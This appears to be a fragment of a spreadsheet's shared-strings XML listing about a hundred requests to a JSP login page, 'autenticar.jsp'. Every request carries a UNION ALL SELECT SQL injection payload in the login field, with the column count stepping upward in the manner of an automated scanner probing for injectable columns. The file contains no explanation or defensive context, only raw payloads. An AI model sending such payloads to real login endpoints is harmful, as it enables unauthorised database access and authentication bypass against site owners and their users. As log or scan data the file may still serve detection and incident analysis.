    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null#and'bubr'='bubr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and'yvlx'='yvlx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and'pqzd'='pqzd&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and'shoc'='shoc&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'xoxa'='xoxa&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'pigz'='pigz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'msyb'='msyb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'jljr'='jljr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'efjd'='efjd&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'qoku'='qoku&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect656,656,656,656,656,656,656,656,656,656,656#and'pyoj'='pyoj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect709,709,709,709,709,709,709,709,709,709,709,709#and'dxuu'='dxuu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1253,1253,1253,1253,1253,1253,1253,1253,1253,1253,1253,1253,1253#and'sjpo'='sjpo&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect567,567,567,567,567,567,567,567,567,567,567,567,567,567#and'tnwq'='tnwq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect8723,8723,8723,8723,8723,8723,8723,8723,8723,8723,8723,8723,8723,8723,8723#and'aemr'='aemr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744#and'bktk'='bktk&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect307,307,307,307,307,307,307,307,307,307,307,307,307,307,307,307,307#and'xvcc'='xvcc&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536,2536#and'ncka'='ncka&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153#and'dxvu'='dxvu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491#and'jcvi'='jcvi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'tqda'='tqda&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'vxfy'='vxfy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'bhzq'='bhzq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ekeh'='ekeh&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'fayi'='fayi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ftua'='ftua&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'bioj'='bioj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'jqxo'='jqxo&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'epyx'='epyx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#and'aqqr'='aqqr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244#and'agqd'='agqd&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009,5009#and'artl'='artl&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614,5614#and'ugqt'='ugqt&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256#and'ltof'='ltof&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805#and'wxrp'='wxrp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033,2033#and'iccd'='iccd&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240#and'bwkc'='bwkc&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052,9052#and'odem'='odem&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109,9109#and'qcza'='qcza&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398,5398#and'nqoo'='nqoo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#and'irdv'='irdv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#and'tvxh'='tvxh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#and'jroe'='jroe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#and'tttc'='tttc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#and'dykj'='dykj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#and'ujou'='ujou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#and'acbd'='acbd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#and'sxya'='sxya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#and'oapp'='oapp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#and'fdyn'='fdyn&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278,2278#and'hail'='hail&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626,6626#and'splr'='splr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218#and'scva'='scva&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645,7645#and'xhzv'='xhzv&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90#and'xrrj'='xrrj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996,3996#and'kxii'='kxii&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425,425#and'koyb'='koyb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260#and'iroy'='iroy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830,5830#and'utfw'='utfw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636#and'hfig'='hfig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#and'nepq'='nepq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#and'drit'='drit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#and'lhhk'='lhhk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#and'kjcm'='kjcm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#and'iops'='iops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#and'ztkz'='ztkz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,null#and'diue'='diue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,null,null#and'bkti'='bkti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,null,null,null#and'zngo'='zngo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,null,null,null,null#and'qafb'='qafb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576,7576#and'fueh'='fueh&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459,6459#and'pmxf'='pmxf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565#and'kdfz'='kdfz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708,4708#and'ahjy'='ahjy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272,4272#and'opue'='opue&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272,2272#and'boqa'='boqa&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435#and'wsrp'='wsrp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508,6508#and'dyyf'='dyyf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572,1572#and'blgq'='blgq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214,214#and'aubx'='aubx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull--and'moip'='moip&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null--and'hnra'='hnra&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null--and'iheq'='iheq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null--and'rthn'='rthn&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null--and'hwde'='hwde&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null--and'klox'='klox&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null--and'swii'='swii&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null--and'syrd'='syrd&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null--and'ebhw'='ebhw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null--and'vjvm'='vjvm&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7341--and'diwp'='diwp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5326,5326--and'ueto'='ueto&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7559,7559,7559--and'ijbd'='ijbd&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2769,2769,2769,2769--and'cqbe'='cqbe&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2009,2009,2009,2009,2009--and'akpu'='akpu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2756,2756,2756,2756,2756,2756--and'oeku'='oeku&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect453,453,453,453,453,453,453--and'czzx'='czzx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6736,6736,6736,6736,6736,6736,6736,6736--and'gjwt'='gjwt&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect237,237,237,237,237,237,237,237,237--and'pkaq'='pkaq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4021,4021,4021,4021,4021,4021,4021,4021,4021,4021--and'vcct'='vcct&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null--and'tpsx'='tpsx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and'ovxx'='ovxx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and'ztnv'='ztnv&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and'jlxz'='jlxz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ybtm'='ybtm&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'kujg'='kujg&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'gfih'='gfih&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'hiiw'='hiiw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'mczy'='mczy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'dmuf'='dmuf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect509,509,509,509,509,509,509,509,509,509,509--and'yljs'='yljs&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6045,6045,6045,6045,6045,6045,6045,6045,6045,6045,6045,6045--and'jgkc'='jgkc&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect8803,8803,8803,8803,8803,8803,8803,8803,8803,8803,8803,8803,8803--and'manv'='manv&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1582,1582,1582,1582,1582,1582,1582,1582,1582,1582,1582,1582,1582,1582--and'bksc'='bksc&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431--and'odfw'='odfw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5718,5718,5718,5718,5718,5718,5718,5718,5718,5718,5718,5718,5718,5718,5718,5718--and'rmvu'='rmvu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545--and'ybzg'='ybzg&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943,5943--and'nemj'='nemj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433,6433--and'qxjj'='qxjj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611,3611--and'upqw'='upqw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'mqct'='mqct&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'gihf'='gihf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'pmzp'='pmzp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'jwwx'='jwwx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
